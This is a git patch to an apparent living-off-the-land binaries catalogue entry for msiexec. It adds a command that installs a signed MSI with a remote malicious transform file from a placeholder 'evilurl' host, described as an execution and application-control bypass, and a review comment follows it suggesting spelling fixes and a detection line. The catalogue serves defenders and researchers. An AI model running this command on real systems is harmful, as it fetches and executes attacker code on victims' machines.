From ee78111254eeaca96c96bf46457928ba726705e1 Mon Sep 17 00:00:00 2001 From: pfiatde <47333109+PfiatDe@users.noreply.github.com> Date: Mon, 6 Nov 2023 13:47:04 +0100 Subject: [PATCH] Update Msiexec.yml (#333) * Update Msiexec.yml Added transform file execution * Update Msiexec.yml --- yml/OSBinaries/Msiexec.yml | 8 ++++++++ 1 file changed, 8 insertions(+) diff --git a/yml/OSBinaries/Msiexec.yml b/yml/OSBinaries/Msiexec.yml index 6e204f5..7a42552 100644 --- a/yml/OSBinaries/Msiexec.yml +++ b/yml/OSBinaries/Msiexec.yml @@ -32,6 +32,13 @@ Commands: Privileges: User MitreID: T1218.007 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 + - Command: msiexec /i "https://trustedURL/signed.msi" TRANSFORMS="https://evilurl/evil.mst" /qb + Description: Installs the target .MSI file from a remote URL, the file can be signed by vendor. Additional to the file a Transformfile will be used, which can contains malicious code or binaries. The /qb will skip user input. + Usecase: Install trusted and signed msi file, with additional attack code as Treansorm file, from remote server + Category: Execute + Privileges: User + MitreID: T1218.007 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Full_Path: - Path: C:\Windows\System32\msiexec.exe - Path: C:\Windows\SysWOW64\msiexec.exe @@ -46,6 +53,7 @@ Detection: Resources: - Link: https://pentestlab.blog/2017/06/16/applocker-bypass-msiexec/ - Link: https://twitter.com/PhilipTsukerman/status/992021361106268161 + - Link: https://badoption.eu/blog/2023/10/03/MSIFortune.html Acknowledgement: - Person: netbiosX Handle: '@netbiosX'
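Review bot: the new Msiexec.yml entry has spelling and grammar slips in its Description and Usecase fields that should be fixed before merge: "Transformfile" should be "transform file", "which can contains" should be "which can contain", "Treansorm file" should be "transform file", and "Additional to the file" reads better as "In addition to the .MSI". The hunk also adds an Execute entry without a matching Detection line even though the file has a Detection section (visible in the second hunk's header); a line pointing defenders at msiexec command lines whose TRANSFORMS= value is a remote URL would make the entry as useful for detection as it is for documentation.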